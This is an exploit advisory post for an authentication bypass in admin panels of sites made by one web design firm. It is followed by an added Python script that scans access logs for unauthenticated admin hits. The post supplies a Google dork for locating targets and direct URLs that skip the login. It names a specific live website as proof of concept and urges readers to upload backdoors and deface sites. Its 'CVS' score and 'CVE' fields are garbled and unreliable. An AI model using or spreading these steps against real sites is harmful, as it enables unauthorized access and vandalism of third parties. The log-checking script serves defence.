I am posting my exploit, Linux Optic Web Design and Development - Login Bypass, which has a CVS (Critical Vulnerability Scaling) score of 8.1 out of 10.
# Exploit Title: Direct login to admin panel without entering password
# Google Dork: Design by www.linuxoptic.com 2009
# Date: 2015-07-10
# Exploit Author: Aaditya Purani
# Vendor Homepage: www.linuxoptic.com
# Software Link: No software link
# Version: 2009 Web admin login panel
# Tested on: Kali Linux / Windows 7
# CVE : Critical Vulnerability

Hello,

This is Aaditya Purani, and I have found a critical bug in websites which have been designed by Linuxoptic.

First, type the dork "Design by www.linuxoptic.com 2009" into Google without the double quotes (").

Then find a site in which "Design by www.linuxoptic.com 2009" is written in the footer.

Now go to its admin page:
http://www.targetsite.com/adminpanel

After opening the admin panel, follow this link:
http://www.targetsite.com/adminpanel/home.php

And voila, you will be directly logged in to the admin panel, and you can also upload your backdoor and deface.

# POC:

Site: http://www.carrefamily.com/
Its admin panel: http://www.carrefamily.com/adminpanel
Directly log in to admin panel: http://www.carrefamily.com/adminpanel/home.php

Thank you
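For a site owner who wants to check their own logs for the direct request to /adminpanel/home.php described above, the following added example (not part of the original advisory) flags admin pages that were served with status 200 to a client that never completed a login. The login path, the 302-on-success behaviour and the log lines are assumptions constructed for illustration.

```python
import re

# Constructed sample access log; the client IPs are documentation addresses.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Jul/2015:10:00:01 +0000] "GET /adminpanel/ HTTP/1.1" 200 1204
192.0.2.10 - - [10/Jul/2015:10:00:09 +0000] "POST /adminpanel/index.php HTTP/1.1" 302 0
192.0.2.10 - - [10/Jul/2015:10:00:10 +0000] "GET /adminpanel/home.php HTTP/1.1" 200 5310
198.51.100.7 - - [10/Jul/2015:10:05:00 +0000] "GET /adminpanel/ HTTP/1.1" 200 1204
198.51.100.7 - - [10/Jul/2015:10:05:03 +0000] "GET /adminpanel/home.php HTTP/1.1" 200 5310
203.0.113.5 - - [10/Jul/2015:10:06:00 +0000] "GET /adminpanel/home.php HTTP/1.1" 302 0
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')

ADMIN_PREFIX = "/adminpanel/"
LOGIN_PATH = "/adminpanel/index.php"  # assumption: where the login form posts
LOGIN_OK_STATUS = "302"               # assumption: a successful login redirects
PUBLIC_PATHS = {"/adminpanel", "/adminpanel/", LOGIN_PATH}


def find_unauthenticated_admin_hits(log_text):
    """Return (ip, timestamp, path) for admin pages served without a prior login.

    The client IP stands in for the session, which is a coarse approximation:
    clients behind a shared NAT or proxy can hide or produce findings.
    """
    logged_in = set()
    findings = []
    for line in log_text.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue
        ip, timestamp, method, url, status = match.groups()
        path = url.split("?", 1)[0]
        if method == "POST" and path == LOGIN_PATH and status == LOGIN_OK_STATUS:
            logged_in.add(ip)
        elif (path.startswith(ADMIN_PREFIX) and path not in PUBLIC_PATHS
              and status == "200" and ip not in logged_in):
            # A protected page rendered for a client that never authenticated.
            findings.append((ip, timestamp, path))
    return findings


if __name__ == "__main__":
    for ip, timestamp, path in find_unauthenticated_admin_hits(SAMPLE_LOG):
        print(f"{timestamp} {ip} reached {path} without logging in")
```

A server that enforces a session check on every admin page answers the same request with a redirect to the login form, as the last constructed log line shows, and produces no finding.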